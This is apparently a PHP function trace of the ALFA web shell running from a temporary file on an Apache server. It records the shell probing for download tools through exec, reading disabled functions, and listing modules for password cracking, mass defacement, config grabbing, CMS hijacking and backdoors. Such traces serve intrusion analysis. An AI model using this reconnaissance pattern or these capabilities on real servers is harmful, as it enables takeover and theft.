8	423	1	0.059480	438768
8	423	R			'/usr/bin/curl'
8	424	0	0.059503	438664	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/curl']
8	424	1	0.059520	438728
8	424	R			'/usr/bin/curl'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/curl'
7	421	1	0.059547	438264
7	421	R			'/usr/bin/curl'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/curl'
6	420	1	0.059579	438264
6	420	R			'/usr/bin/curl'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/curl'
5	419	1	0.059605	438184
5	419	R			13
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	++$x
5	425	0	0.059629	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	1	'get'
6	426	0	0.059643	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which get'	FALSE	FALSE	???
7	427	0	0.059658	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which get'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	428	0	0.059683	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	428	1	0.059697	438264
8	428	R			TRUE
8	429	0	0.059710	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which get'	''
8	429	1	0.060881	438368
8	429	R			''
8	430	0	0.060903	438304	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	430	1	0.060918	438368
8	430	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	427	1	0.060944	438224
7	427	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	426	1	0.060968	438224
6	426	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	425	1	0.060991	438184
5	425	R			FALSE
5	431	0	0.061005	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	1	'lwp-mirror'
6	432	0	0.061019	438232	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which lwp-mirror'	FALSE	FALSE	???
7	433	0	0.061035	438232	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which lwp-mirror'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	434	0	0.061060	438232	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	434	1	0.061073	438272
8	434	R			TRUE
8	435	0	0.061087	438256	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which lwp-mirror'	''
8	435	1	0.062289	438792
8	435	R			'/usr/bin/lwp-mirror'
8	436	0	0.062315	438680	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/lwp-mirror']
8	436	1	0.062332	438744
8	436	R			'/usr/bin/lwp-mirror'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/lwp-mirror'
7	433	1	0.062360	438280
7	433	R			'/usr/bin/lwp-mirror'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/lwp-mirror'
6	432	1	0.062388	438280
6	432	R			'/usr/bin/lwp-mirror'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/lwp-mirror'
5	431	1	0.062415	438184
5	431	R			19
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	++$x
5	437	0	0.062440	438184	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1181	1	'get_magic_quotes_gpc'
5	437	1	0.062455	438224
5	437	R			TRUE
5	438	0	0.062468	438184	get_magic_quotes_gpc	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1181	0
5	438	1	0.062480	438184
5	438	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1181	$quotes = FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1181	$magic = '<span class="header_off">OFF</span>'
5	439	0	0.062520	438184	Alfa_GetDisable_Function	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1183	0
6	440	0	0.062533	438184	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	917	1	'disable_functions'
6	440	1	0.062547	438664
6	440	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	917	$disfun = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
6	441	0	0.062595	438632	explode	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	920	2	','	'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
6	441	1	0.062623	441104
6	441	R			[0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	920	$s = [0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
6	442	0	0.062689	441032	array_unique	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	921	1	[0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
6	442	1	0.062721	442400
6	442	R			[0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	921	$s = [0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	922	$i = 0
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	925	$black_list = []
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	926	$allow_list = []
6	443	0	0.062814	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_alarm'
6	443	1	0.062827	441064
6	443	R			'pcntl_alarm'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_alarm'
6	444	0	0.062853	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_alarm'
6	444	1	0.062868	441064
6	444	R			FALSE
6	445	0	0.062881	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_fork'
6	445	1	0.062894	441064
6	445	R			'pcntl_fork'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_fork'
6	446	0	0.062919	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_fork'
6	446	1	0.062932	441064
6	446	R			FALSE
6	447	0	0.062945	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_waitpid'
6	447	1	0.062958	441064
6	447	R			'pcntl_waitpid'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_waitpid'
6	448	0	0.062983	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_waitpid'
6	448	1	0.062996	441064
6	448	R			FALSE
6	449	0	0.063009	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wait'
6	449	1	0.063021	441064
6	449	R			'pcntl_wait'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wait'
6	450	0	0.063045	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wait'
6	450	1	0.063058	441064
6	450	R			FALSE
6	451	0	0.063071	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wifexited'
6	451	1	0.063084	441064
6	451	R			'pcntl_wifexited'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wifexited'
6	452	0	0.063108	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wifexited'
6	452	1	0.063121	441064
6	452	R			FALSE
6	453	0	0.063134	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wifstopped'
6	453	1	0.063147	441064
6	453	R			'pcntl_wifstopped'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wifstopped'
6	454	0	0.063171	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wifstopped'
6	454	1	0.063189	441064
6	454	R			FALSE
6	455	0	0.063202	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wifsignaled'
6	455	1	0.063214	441064
6	455	R			'pcntl_wifsignaled'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wifsignaled'
6	456	0	0.063239	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wifsignaled'
6	456	1	0.063252	441064
6	456	R			FALSE
6	457	0	0.063264	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wifcontinued'
6	457	1	0.063277	441064
6	457	R			'pcntl_wifcontinued'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wifcontinued'
6	458	0	0.063302	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wifcontinued'
6	458	1	0.063315	441064
6	458	R			FALSE
6	459	0	0.063327	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wexitstatus'
6	459	1	0.063340	441064
6	459	R			'pcntl_wexitstatus'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wexitstatus'
6	460	0	0.063364	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wexitstatus'
6	460	1	0.063377	441064
6	460	R			FALSE
6	461	0	0.063390	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wtermsig'
6	461	1	0.063403	441064
6	461	R			'pcntl_wtermsig'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wtermsig'
6	462	0	0.063427	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wtermsig'
6	462	1	0.063440	441064
6	462	R			FALSE
6	463	0	0.063452	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wstopsig'
6	463	1	0.063465	441064
6	463	R			'pcntl_wstopsig'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wstopsig'
6	464	0	0.063489	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wstopsig'
6	464	1	0.063502	441064
6	464	R			FALSE
6	465	0	0.063515	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_signal'
6	465	1	0.063527	441064
6	465	R			'pcntl_signal'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_signal'
6	466	0	0.063551	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_signal'
6	466	1	0.063563	441064
6	466	R			FALSE
6	467	0	0.063576	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_signal_get_handler'
6	467	1	0.063588	441064
6	467	R			'pcntl_signal_get_handler'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_signal_get_handler'
6	468	0	0.063614	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_signal_get_handler'
6	468	1	0.063627	441064
6	468	R			FALSE
6	469	0	0.063640	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_signal_dispatch'
6	469	1	0.063652	441064
6	469	R			'pcntl_signal_dispatch'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_signal_dispatch'
6	470	0	0.063678	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_signal_dispatch'
6	470	1	0.063690	441064
6	470	R			FALSE
6	471	0	0.063703	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_get_last_error'
6	471	1	0.063715	441064
6	471	R			'pcntl_get_last_error'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_get_last_error'
6	472	0	0.063741	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_get_last_error'
6	472	1	0.063753	441064
6	472	R			FALSE
6	473	0	0.063766	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_strerror'
6	473	1	0.063778	441064
6	473	R			'pcntl_strerror'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_strerror'
6	474	0	0.063803	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_strerror'
6	474	1	0.063819	441064
6	474	R			FALSE
6	475	0	0.063832	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_sigprocmask'
6	475	1	0.063844	441064
6	475	R			'pcntl_sigprocmask'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_sigprocmask'
6	476	0	0.063870	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_sigprocmask'
6	476	1	0.063883	441064
6	476	R			FALSE
6	477	0	0.063895	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_sigwaitinfo'
6	477	1	0.063908	441064
6	477	R			'pcntl_sigwaitinfo'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_sigwaitinfo'
6	478	0	0.063933	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_sigwaitinfo'
6	478	1	0.063946	441064
6	478	R			FALSE
6	479	0	0.063958	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_sigtimedwait'
6	479	1	0.063971	441064
6	479	R			'pcntl_sigtimedwait'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_sigtimedwait'
6	480	0	0.063995	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_sigtimedwait'
6	480	1	0.064008	441064
6	480	R			FALSE
6	481	0	0.064020	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_exec'
6	481	1	0.064033	441064
6	481	R			'pcntl_exec'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_exec'
6	482	0	0.064057	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_exec'
6	482	1	0.064070	441064
6	482	R			FALSE
6	483	0	0.064083	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_getpriority'
6	483	1	0.064095	441064
6	483	R			'pcntl_getpriority'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_getpriority'
6	484	0	0.064121	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_getpriority'
6	484	1	0.064134	441064
6	484	R			FALSE
6	485	0	0.064146	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_setpriority'
6	485	1	0.064159	441064
6	485	R			'pcntl_setpriority'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_setpriority'
6	486	0	0.064184	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_setpriority'
6	486	1	0.064196	441064
6	486	R			FALSE
6	487	0	0.064209	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_async_signals'
6	487	1	0.064222	441064
6	487	R			'pcntl_async_signals'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_async_signals'
6	488	0	0.064246	441032	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_async_signals'
6	488	1	0.064259	441064
6	488	R			FALSE
6	489	0	0.064271	441032	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	''
6	489	1	0.064283	441064
6	489	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = ''
5	439	1	0.064307	438184
5	439	R			'<span class="header_show_all">All Functions Accessible</span>'
5	490	0	0.064329	439976	getenv	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1193	1	'SERVER_SOFTWARE'
5	490	1	0.064346	440056
5	490	R			'Apache/2.4.52 (Ubuntu)'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'proc'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'phpeval'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'sql'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'dumper'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'coldumper'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'hash'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'connect'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'zoneh'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'dos'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'safe'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'cgishell'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'ssiShell'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'cpcrack'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'portscanner'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'basedir'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'mail'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'ziper'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'deziper'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'IndexChanger'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'pwchanger'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'ShellInjectors'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'php2xml'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'cloudflare'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'Whmcs'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'symlink'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'MassDefacer'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'Crackers'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'searcher'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'config_grabber'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'fakepage'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'archive_manager'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'cmshijacker'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'remotedl'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'inbackdoor'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'whois'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'selfrm'
4	65	1	0.065174	434688
4	491	0	0.065183	434688	AlfaNum	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2561	7	8	9	10	7	6	5	4
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	949	$alfax = []
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	950	$find = []
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	$i = 1
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 1
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 2
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 3
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 4
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 5
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 6
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 7
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 8
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 9
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 10
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	955	$find[] = 8
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	955	$find[] = 9
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	955	$find[] = 10
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	955	$find[] = 7
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	955	$find[] = 6
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	955	$find[] = 5
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	955	$find[] = 4
5	492	0	0.065467	436136	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	1	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	492	1	0.065506	436208
5	492	R			FALSE
5	493	0	0.065524	436136	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	2	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	493	1	0.068631	436208
5	493	R			FALSE
